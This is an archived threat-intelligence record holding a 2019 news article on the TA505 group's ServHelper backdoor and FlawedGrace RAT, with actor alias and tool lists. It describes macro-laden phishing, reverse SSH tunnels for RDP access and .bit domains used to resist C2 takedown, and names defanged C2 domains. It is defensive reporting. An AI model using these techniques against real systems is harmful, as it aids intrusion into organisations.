{
	"id": "74b14470-fa98-481c-8852-30cdfe76e323",
	"created_at": "2026-04-06T00:12:29.161206Z",
	"updated_at": "2026-04-10T03:36:36.991643Z",
	"deleted_at": null,
	"sha1_hash": "908280f8d536a25a47cabb69f3f6f5dce653b164",
	"title": "TA505 Group Adopts New ServHelper Backdoor and FlawedGrace RAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2242524,
	"plain_text": "TA505 Group Adopts New ServHelper Backdoor and FlawedGrace RAT\r\nBy Ionut Ilascu\r\nPublished: 2019-01-10 · Archived: 2026-04-05 13:51:55 UTC\r\nMalware researchers discovered two new malware families distributed through phishing campaigns last year carried out by\r\nthe TA505 cybercriminal group: ServHelper backdoor with two variants and FlawedGrace remote access trojan (RAT).\r\nThe threat actor continues to target organizations in the financial and retail sectors, the researchers say, using Microsoft\r\nWord, Microsoft Publisher, and PDF files pull the malware on the victim computer host.\r\nTA505, the name given by Proofpoint, has been in the cybercrime business for at least four years. This is the group behind\r\nthe infamous Dridex banking trojan and Locky ransomware, delivered through malicious email campaigns\r\nvia Necurs botnet.\r\nhttps://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/\r\nPage 1 of 6\n\n0:00\r\nhttps://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/\r\nPage 2 of 6\n\nVisit Advertiser websiteGO TO PAGE\r\nOther malware associated with TA505 include Philadelphia and GlobeImposter ransomware families.\r\nServHelper delivered in three campaigns\r\nA first salvo of malicious messages was shot on November 9, 2018.  It was a small campaign with several thousand emails\r\ndelivering Word and Publisher documents laced with hostile macros.\r\nA larger campaign with tens of thousands of emails occurred six days later and carried messages with .DOC, .PUB, and\r\n.WIZ documents, all specific to the same Microsoft Office components mentioned above.\r\nIn a third session, observed on December 13, the threat actor mixed in PDF files with URLs purporting to lead to an Adobe\r\nupdate. Following the link took the potential victim to a fake \"Adobe PDF Plugin\" webpage that led to ServHelper.\r\nProofpoint, who spotted these campaigns and analyzed the two malware families, says that the distribution is not focused on\r\na particular region on the world, and the focus is on financial services organizations.\r\nThe infrastructure used for running these campaigns remains unknown for the time being, but it does not present the\r\nhallmarks specific to Necurs botnet.\r\nActively developed, ServHelper comes in two flavors\r\nThe purpose of the macro was to download and execute a variant of ServHelper that set up reverse SSH tunnels that enabled\r\naccess to the infected host through the Remote Desktop Protocol (RDP) port 3389.\r\n\"Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to “hijack”\r\nlegitimate user accounts or their web browser profiles and use them as they see fit,\" researchers from Proofpoint explain in\r\nan analysis released today.\r\nThe other ServHelper variant does not include the tunneling and hijacking capabilities and functions only as a downloader\r\nfor the FlawedGrace RAT.\r\nhttps://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/\r\nPage 3 of 6\n\nServHelper is written in Delphi and its developers continue to update it with new features and commands. Proofpoint says\r\nthat almost every new campaign reveals a changed variant of the malware.\r\nUse of decentralized DNS\r\nTo protect the command and control (C2) servers against takedown efforts, the developer(s) uses the .bit Top-Level Domain\r\n(TLD) for the Domain Name System (DNS) servers.\r\nResearchers found two such DNS servers resolving the IP addresses for four ServHelper's C2 servers: dedsolutions[.]bit and\r\narepos[.]bit.\r\nInternet TLDs like .com and .org and Country Code TLDs (ccTLD) designated for a particular country are maintained by the\r\nInternet Corporation for Assigned Names and Numbers (ICANN).\r\nSecurity researchers and law enforcement agencies can ask ICANN to force a domain registry or registrar to shut-down,\r\nseize or sinkhole a domain name.\r\nA .bit TLD does not fall under the umbrella of ICANN and is instead available through Namecoin cryptocurrency's\r\nblockchain transaction database.\r\nThe domain name is shared over a peer-to-peer network, making it fully decentralized and immune to any government or\r\norganization's efforts to regulate, suspend, or sinkhole it. Other decentralized TLDs are .emc, .lib, .bazar, .coin.\r\nhttps://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/\r\nPage 4 of 6\n\nProofpoint told BleepingComputer that not all C2 infrastructure uses .bit domains and can be taken down. \"In other cases,\r\nparticularly those using crypto dns, defenders need to rely on layered security to block related traffic,\" they added.\r\nFlawedGrace is a tough nut to crack\r\nProofpoint is not at the first encounter with the FlawedGrace RAT, as the malware caught the researchers' eye since early\r\nNovember 2017.\r\nAlthough multiple variants exist, some as early as August 2017, it was not seen actively distributed until recently.\r\n\"Per the malware’s debug strings, significant development took place during the end of 2017. The ServHelper campaigns\r\nwere distributing version 2.0.10 of the malware [built on November 20, 2017],\" the researchers note in their report.\r\nThey also point out that FlawedGrace is a full-featured RAT written in C++ and that it is a very large program that\r\n\"extensive use of object-oriented and multithreaded programming techniques.\" As a consequence, getting familiar with its\r\ninternal structure takes a lot of time and is far from a simple task.\r\nAfter analyzing both malware families, the researchers were able to conclude that there are sufficient discrepancies in the\r\ncoding style and techniques to be the work of different developers.\r\nUpdate [01.10.2019]: The article erroneously mentioned that Necurs botnet was used to run the email campaigns that\r\ndelivered ServHelper and FlawedGrace malware. We have updated it to reflect that and that the TA505 group is behind the\r\nnew malware families. We also included comments from Proofpoint.\r\nhttps://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/\r\nPage 5 of 6\n\nAutomated Pentesting Covers Only 1 of 6 Surfaces.\r\nAutomated pentesting proves the path exists. BAS proves whether your controls stop it. Most teams run one without the\r\nother.\r\nThis whitepaper maps six validation surfaces, shows where coverage ends, and provides practitioners with three diagnostic\r\nquestions for any tool evaluation.\r\nSource: https://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/\r\nhttps://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/"
	],
	"report_names": [
		"ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59",
			"created_at": "2024-06-19T02:03:08.128175Z",
			"updated_at": "2026-04-10T02:00:03.636663Z",
			"deleted_at": null,
			"main_name": "GOLD TAHOE",
			"aliases": [
				"Cl0P Group Identity",
				"FIN11 ",
				"GRACEFUL SPIDER ",
				"SectorJ04 ",
				"Spandex Tempest ",
				"TA505 "
			],
			"source_name": "Secureworks:GOLD TAHOE",
			"tools": [
				"Clop",
				"Cobalt Strike",
				"FlawedAmmy",
				"Get2",
				"GraceWire",
				"Malichus",
				"SDBbot",
				"ServHelper",
				"TrueBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4",
			"created_at": "2022-10-25T15:50:23.5188Z",
			"updated_at": "2026-04-10T02:00:05.26565Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"TA505",
				"Hive0065",
				"Spandex Tempest",
				"CHIMBORAZO"
			],
			"source_name": "MITRE:TA505",
			"tools": [
				"AdFind",
				"Azorult",
				"FlawedAmmyy",
				"Mimikatz",
				"Dridex",
				"TrickBot",
				"Get2",
				"FlawedGrace",
				"Cobalt Strike",
				"ServHelper",
				"Amadey",
				"SDBbot",
				"PowerSploit"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3",
			"created_at": "2023-01-06T13:46:38.860754Z",
			"updated_at": "2026-04-10T02:00:03.125179Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"SectorJ04",
				"SectorJ04 Group",
				"ATK103",
				"GRACEFUL SPIDER",
				"GOLD TAHOE",
				"Dudear",
				"G0092",
				"Hive0065",
				"CHIMBORAZO",
				"Spandex Tempest"
			],
			"source_name": "MISPGALAXY:TA505",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e447d393-c259-46e2-9932-19be2ba67149",
			"created_at": "2022-10-25T16:07:24.28282Z",
			"updated_at": "2026-04-10T02:00:04.921616Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"ATK 103",
				"Chimborazo",
				"G0092",
				"Gold Evergreen",
				"Gold Tahoe",
				"Graceful Spider",
				"Hive0065",
				"Operation Tovar",
				"Operation Trident Breach",
				"SectorJ04",
				"Spandex Tempest",
				"TA505",
				"TEMP.Warlock"
			],
			"source_name": "ETDA:TA505",
			"tools": [
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"Azer",
				"Bart",
				"Bugat v5",
				"CryptFile2",
				"CryptoLocker",
				"CryptoMix",
				"CryptoShield",
				"Dridex",
				"Dudear",
				"EmailStealer",
				"FRIENDSPEAK",
				"Fake Globe",
				"Fareit",
				"FlawedAmmyy",
				"FlawedGrace",
				"FlowerPippi",
				"GOZ",
				"GameOver Zeus",
				"GazGolder",
				"Gelup",
				"Get2",
				"GetandGo",
				"GlobeImposter",
				"Gorhax",
				"GraceWire",
				"Gussdoor",
				"Jaff",
				"Kasidet",
				"Kegotip",
				"Kneber",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Locky",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MirrorBlast",
				"Neutrino Bot",
				"Neutrino Exploit Kit",
				"P2P Zeus",
				"Peer-to-Peer Zeus",
				"Philadelphia",
				"Philadephia Ransom",
				"Pony Loader",
				"Rakhni",
				"ReflectiveGnome",
				"Remote Manipulator System",
				"RockLoader",
				"RuRAT",
				"SDBbot",
				"ServHelper",
				"Shifu",
				"Siplog",
				"TeslaGun",
				"TiniMet",
				"TinyMet",
				"Trojan.Zbot",
				"Wsnpoem",
				"Zbot",
				"Zeta",
				"ZeuS",
				"Zeus"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434349,
	"ts_updated_at": 1775792196,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/908280f8d536a25a47cabb69f3f6f5dce653b164.pdf",
		"text": "https://archive.orkl.eu/908280f8d536a25a47cabb69f3f6f5dce653b164.txt",
		"img": "https://archive.orkl.eu/908280f8d536a25a47cabb69f3f6f5dce653b164.jpg"
	}
}